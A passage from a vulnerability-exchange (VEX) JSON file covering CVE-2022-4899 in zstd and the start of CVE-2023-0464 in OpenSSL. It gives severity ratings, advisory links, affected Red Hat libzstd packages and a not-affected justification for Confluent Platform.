          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        400
      ],
      "description": "A vulnerability was found in zstd v1.4.10, where an attacker can supply empty string as an argument to the command line tool to cause buffer overrun.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-4899"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:0894"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:1141"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-4899"
        },
        {
          "url": "https://bugzilla.redhat.com/2179864"
        },
        {
          "url": "https://bugzilla.redhat.com/2188109"
        },
        {
          "url": "https://bugzilla.redhat.com/2188113"
        },
        {
          "url": "https://bugzilla.redhat.com/2188115"
        },
        {
          "url": "https://bugzilla.redhat.com/2188116"
        },
        {
          "url": "https://bugzilla.redhat.com/2188117"
        },
        {
          "url": "https://bugzilla.redhat.com/2188118"
        },
        {
          "url": "https://bugzilla.redhat.com/2188119"
        },
        {
          "url": "https://bugzilla.redhat.com/2188120"
        },
        {
          "url": "https://bugzilla.redhat.com/2188121"
        },
        {
          "url": "https://bugzilla.redhat.com/2188122"
        },
        {
          "url": "https://bugzilla.redhat.com/2188123"
        },
        {
          "url": "https://bugzilla.redhat.com/2188124"
        },
        {
          "url": "https://bugzilla.redhat.com/2188125"
        },
        {
          "url": "https://bugzilla.redhat.com/2188127"
        },
        {
          "url": "https://bugzilla.redhat.com/2188128"
        },
        {
          "url": "https://bugzilla.redhat.com/2188129"
        },
        {
          "url": "https://bugzilla.redhat.com/2188130"
        },
        {
          "url": "https://bugzilla.redhat.com/2188131"
        },
        {
          "url": "https://bugzilla.redhat.com/2188132"
        },
        {
          "url": "https://bugzilla.redhat.com/2224211"
        },
        {
          "url": "https://bugzilla.redhat.com/2224212"
        },
        {
          "url": "https://bugzilla.redhat.com/2224213"
        },
        {
          "url": "https://bugzilla.redhat.com/2224214"
        },
        {
          "url": "https://bugzilla.redhat.com/2224215"
        },
        {
          "url": "https://bugzilla.redhat.com/2224216"
        },
        {
          "url": "https://bugzilla.redhat.com/2224217"
        },
        {
          "url": "https://bugzilla.redhat.com/2224218"
        },
        {
          "url": "https://bugzilla.redhat.com/2224219"
        },
        {
          "url": "https://bugzilla.redhat.com/2224220"
        },
        {
          "url": "https://bugzilla.redhat.com/2224221"
        },
        {
          "url": "https://bugzilla.redhat.com/2224222"
        },
        {
          "url": "https://bugzilla.redhat.com/2245014"
        },
        {
          "url": "https://bugzilla.redhat.com/2245015"
        },
        {
          "url": "https://bugzilla.redhat.com/2245016"
        },
        {
          "url": "https://bugzilla.redhat.com/2245017"
        },
        {
          "url": "https://bugzilla.redhat.com/2245018"
        },
        {
          "url": "https://bugzilla.redhat.com/2245019"
        },
        {
          "url": "https://bugzilla.redhat.com/2245020"
        },
        {
          "url": "https://bugzilla.redhat.com/2245021"
        },
        {
          "url": "https://bugzilla.redhat.com/2245022"
        },
        {
          "url": "https://bugzilla.redhat.com/2245023"
        },
        {
          "url": "https://bugzilla.redhat.com/2245024"
        },
        {
          "url": "https://bugzilla.redhat.com/2245026"
        },
        {
          "url": "https://bugzilla.redhat.com/2245027"
        },
        {
          "url": "https://bugzilla.redhat.com/2245028"
        },
        {
          "url": "https://bugzilla.redhat.com/2245029"
        },
        {
          "url": "https://bugzilla.redhat.com/2245030"
        },
        {
          "url": "https://bugzilla.redhat.com/2245031"
        },
        {
          "url": "https://bugzilla.redhat.com/2245032"
        },
        {
          "url": "https://bugzilla.redhat.com/2245033"
        },
        {
          "url": "https://bugzilla.redhat.com/2245034"
        },
        {
          "url": "https://bugzilla.redhat.com/2258771"
        },
        {
          "url": "https://bugzilla.redhat.com/2258772"
        },
        {
          "url": "https://bugzilla.redhat.com/2258773"
        },
        {
          "url": "https://bugzilla.redhat.com/2258774"
        },
        {
          "url": "https://bugzilla.redhat.com/2258775"
        },
        {
          "url": "https://bugzilla.redhat.com/2258776"
        },
        {
          "url": "https://bugzilla.redhat.com/2258777"
        },
        {
          "url": "https://bugzilla.redhat.com/2258778"
        },
        {
          "url": "https://bugzilla.redhat.com/2258779"
        },
        {
          "url": "https://bugzilla.redhat.com/2258780"
        },
        {
          "url": "https://bugzilla.redhat.com/2258781"
        },
        {
          "url": "https://bugzilla.redhat.com/2258782"
        },
        {
          "url": "https://bugzilla.redhat.com/2258783"
        },
        {
          "url": "https://bugzilla.redhat.com/2258784"
        },
        {
          "url": "https://bugzilla.redhat.com/2258785"
        },
        {
          "url": "https://bugzilla.redhat.com/2258787"
        },
        {
          "url": "https://bugzilla.redhat.com/2258788"
        },
        {
          "url": "https://bugzilla.redhat.com/2258789"
        },
        {
          "url": "https://bugzilla.redhat.com/2258790"
        },
        {
          "url": "https://bugzilla.redhat.com/2258791"
        },
        {
          "url": "https://bugzilla.redhat.com/2258792"
        },
        {
          "url": "https://bugzilla.redhat.com/2258793"
        },
        {
          "url": "https://bugzilla.redhat.com/2258794"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2179864"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188109"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188113"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188115"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188116"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188117"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188118"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188119"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188120"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188121"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188122"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188123"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188124"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188125"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188127"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188128"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188129"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188130"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188131"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2188132"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224211"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224212"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224213"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224214"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224215"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224216"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224217"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224219"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224221"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2224222"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245014"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245015"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245016"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245017"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245018"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245019"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245020"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245021"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245022"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245023"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245024"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245026"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245027"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245028"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245029"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245030"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245031"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245032"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245033"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245034"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258771"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258772"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258773"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258774"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258775"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258776"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258777"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258778"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258779"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258780"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258781"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258782"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258783"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258784"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258785"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258787"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258788"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258789"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258790"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258791"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258792"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258793"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2258794"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4899"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21911"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21919"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21920"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21929"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21933"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21935"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21940"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21945"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21946"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21947"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21953"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21955"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21962"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21972"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21976"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21977"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21980"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21982"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22005"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22007"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22008"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22032"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22033"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22038"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22046"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22048"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22053"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22054"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22056"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22057"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22058"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22059"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22064"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22065"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22066"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22068"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22070"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22078"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22079"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22084"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22092"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22097"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22103"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22104"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22110"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22111"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22112"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22113"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22114"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22115"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20960"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20961"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20962"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20963"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20964"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20965"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20966"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20967"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20968"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20969"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20970"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20971"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20972"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20973"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20974"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20976"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20977"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20978"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20981"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20982"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20983"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20984"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20985"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20993"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21049"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21050"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21051"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21052"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21053"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21055"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21056"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21057"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21061"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21137"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21200"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-1141.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2024:0894"
        },
        {
          "url": "https://github.com/facebook/zstd"
        },
        {
          "url": "https://github.com/facebook/zstd/issues/3200"
        },
        {
          "url": "https://github.com/facebook/zstd/pull/3220"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/zstd/PYSEC-2023-121.yaml"
        },
        {
          "url": "https://github.com/sergey-dryabzhinsky/python-zstd/commit/c8a619aebdbd6b838fbfef6e19325a70f631a4c6"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2022-4899.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-1141.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C63HAGVLQA6FJNDCHR7CNZZL6VSLILB2"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C63HAGVLQA6FJNDCHR7CNZZL6VSLILB2/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JEHRBBYYTPA4DETOM5XAKGCP37NUTLOA"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JEHRBBYYTPA4DETOM5XAKGCP37NUTLOA/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QYLDK6ODVC4LJSDULLX6Q2YHTFOWABCN"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QYLDK6ODVC4LJSDULLX6Q2YHTFOWABCN/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-4899"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230725-0005"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20230725-0005/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-4899"
        }
      ],
      "published": "2023-03-31T20:15:07+00:00",
      "updated": "2026-06-17T05:22:14+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.4.4-1.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libzstd@1.4.4-1.el8?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "Java Runtime that executes Confluent Platform\u00a0 is not linked against the vulnerable system library. That assures that the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2023-0464",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        295
      ],
      "description": "A security vulnerability has been identified in all supported versions\n\nof OpenSSL related to the verification of X.509 certificate chains\nthat include policy constraints.  Attackers may be able to exploit this\nvulnerability by creating a malicious certificate chain that triggers\nexponential use of computational resources, leading to a denial-of-service\n(DoS) attack on affected systems.\n\nPolicy processing is disabled by default but can be enabled by passing\nthe `-policy' argument to the command line utilities or by calling the\n`X509_VERIFY_PARAM_set1_policies()' function.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-0464"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2023:3722"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-0464"
        },
        {
          "url": "https://bugzilla.redhat.com/2181082"
        },
        {
          "url": "https://bugzilla.redhat.com/2182561"
        },
        {
          "url": "https://bugzilla.redhat.com/2182565"
        },
        {
          "url": "https://bugzilla.redhat.com/2188461"
        },
        {
          "url": "https://bugzilla.redhat.com/2207947"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2023-3722.html"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b"
        },
        {
          "url": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1"
        },
        {
          "url": "https://github.com/advisories/GHSA-w2w6-xp88-5cvw"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-0464.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2023-3722.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html"
        },
        {
